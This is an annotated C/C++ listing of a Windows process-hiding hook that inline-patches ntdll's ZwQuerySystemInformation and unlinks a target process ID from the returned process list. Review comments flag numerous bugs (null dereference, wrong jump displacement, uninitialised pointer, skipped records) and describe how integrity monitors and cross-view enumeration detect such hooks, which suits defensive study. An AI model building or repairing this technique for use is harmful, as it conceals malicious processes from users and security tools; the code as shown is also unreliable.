```c
// Installs an inline patch on the export OldFunName of module szModule:
// the first 9 bytes of the function are saved into OldData, a stub whose
// first byte is 0xe9 (near jmp opcode) is built in NewData, and that stub
// is written over the function prologue.
// Returns FALSE when the prologue already starts with 0xe9, when the export
// cannot be resolved, or when either data buffer is NULL; TRUE otherwise.
// NOTE(review): the "already hooked" test below (first byte == 0xe9) is the
// same heuristic integrity monitors apply: an ntdll export whose in-memory
// prologue differs from the on-disk image is a standard user-mode hook
// indicator, and the RWX VirtualProtect on an ntdll page is itself a
// memory-protection event worth alerting on.
BOOL FunHook(LPCSTR OldFunName,LPVOID lpNewFun,PBYTE OldData,PBYTE NewData,LPCWSTR szModule)
{
DWORD dwProtect;
LONGLONG dwRelative;
byte pbuf[9]={0xe9,0,};   // never referenced in this function
PBYTE pByte;
LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(szModule),OldFunName);
pByte=(PBYTE)lpZwQuerySystemInformation;
// BUG: pByte is dereferenced here before the NULL test that follows; if
// GetProcAddress failed this reads through a null pointer.
if (pByte[0]==0xe9)
{
MESSAGEBOX(L"The Fun has been hooked!");
return FALSE;
}
if (!lpZwQuerySystemInformation)
{
MESSAGEBOX(L"Fun Hook Failed");
return FALSE;
}
if (!NewData||!OldData){MESSAGEBOX(L"Data parameter transmission error!");return FALSE;}
// Return value is not checked: if the page cannot be made writable, the
// memcpy into pByte below faults.
VirtualProtect(lpZwQuerySystemInformation,9,PAGE_EXECUTE_READWRITE,&dwProtect);
MESSAGEBOX(L"VirtualProtect ");
memcpy(OldData,pByte,9);
NewData[0]=0xe9;
// NOTE(review): the displacement arithmetic uses OldFunName (the address of
// the name string), not the resolved function address, and 8 bytes of it are
// copied after the 0xe9 byte although that opcode takes a 32-bit operand.
// What actually executes at the patched entry cannot be determined from
// this listing alone.
dwRelative=(LONGLONG)lpNewFun-(LONGLONG)OldFunName+9;
memcpy(NewData+1,&dwRelative,8);
memcpy(pByte,NewData,9);
// Restore the previous protection; dwProtect doubles as the out-parameter.
VirtualProtect(lpZwQuerySystemInformation,9,dwProtect,&dwProtect);
MESSAGEBOX(L"VirtualProtect Finished");
return TRUE;
}
// Replacement for ZwQuerySystemInformation installed by FunHook. It removes
// the patch (FunUnhook, defined elsewhere), queries the original export for
// SystemProcessesAndThreadsInformation into a private buffer, unlinks the
// record whose UniqueProcessId equals the file-level global dwProcessid from
// the NextEntryOffset chain, frees the buffer and re-installs the patch.
// Contract as visible here: the caller's SystemInformationClass,
// SystemInformation, SystemInfoemationLength and ReturnLength are never read
// or written; only the NTSTATUS of the internal query is returned.
// NOTE(review): this is the process-list tampering that cross-view
// detection targets — compare the list returned by this API against an
// independent enumeration source and flag records present in one view only.
NTSTATUS NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInfoemationLength,
PULONG ReturnLength) // replacement (hook) function
{
NTSTATUS status;
DWORD dwSizeNeed;
LPVOID lpZwQuerySystemInformation=GetProcAddress(GetModuleHandle(L"ntdll.dll"),"ZwQuerySystemInformation");
// FunUnhook's result is stored in an NTSTATUS and overwritten on the next
// line. The patch is absent from here until the FunHook call at the end;
// that window is visible to concurrent callers and to a prologue scan.
status=FunUnhook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,L"ntdll.dll");
// Size probe: a NULL buffer of length 0 is expected to fail with 0xc0000004
// (STATUS_INFO_LENGTH_MISMATCH) and report the required size in dwSizeNeed.
status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,NULL,0,&dwSizeNeed);
if (status==0xc0000004)
{
MESSAGEBOX(L"进入if (status==0xc0000004)");
PSYSTEM_PROCESS_INFORMATION proar,pforward;   // pforward is not initialised before the loop
BYTE *buffer=new BYTE[dwSizeNeed];             // C++ allocation: this listing is not plain C
// No ReturnLength is passed here; if the process list grew since the probe
// the call fails and the unlink loop below is skipped.
status=((ZWQUERYSYSTEMINFORMATION)lpZwQuerySystemInformation)(SystemProcessesAndThreadsInformation,(PVOID)buffer,dwSizeNeed,NULL);
if (status==0)
{
proar = (PSYSTEM_PROCESS_INFORMATION)buffer;
do {
// Advances before the first comparison, so the first record is never
// examined; if the very next record matches, pforward is still
// uninitialised and the writes through it below are undefined behaviour.
proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
if ((DWORD)proar->UniqueProcessId==dwProcessid)
{
// Unlink: adjust the previous record's link so it skips this one, or
// terminate the chain if this is the last record. The record's bytes
// themselves remain in the buffer; only the link changes.
// NOTE(review): pforward is the record examined in the previous
// iteration, which because of the second advance below is two records
// back, not the immediate predecessor.
if (proar->NextEntryOffset==0)
{
pforward->NextEntryOffset=0;
}else
{
pforward->NextEntryOffset+=proar->NextEntryOffset;
}
}
pforward=proar;
if (proar->NextEntryOffset==0)
{
break;
}
// Second advance in the same iteration; combined with the advance at the
// top of the loop, only every other record is compared — presumably
// unintended.
proar=(PSYSTEM_PROCESS_INFORMATION)((LONGLONG)proar+proar->NextEntryOffset);
} while ( proar->NextEntryOffset != 0 );
}
delete []buffer;
buffer=NULL;
}
// Re-install the patch; FunHook saves the current prologue into lpOldData again.
FunHook("ZwQuerySystemInformation",NewZwQuerySystemInformation,lpOldData,lpNewData,L"ntdll.dll");
return status;
}
```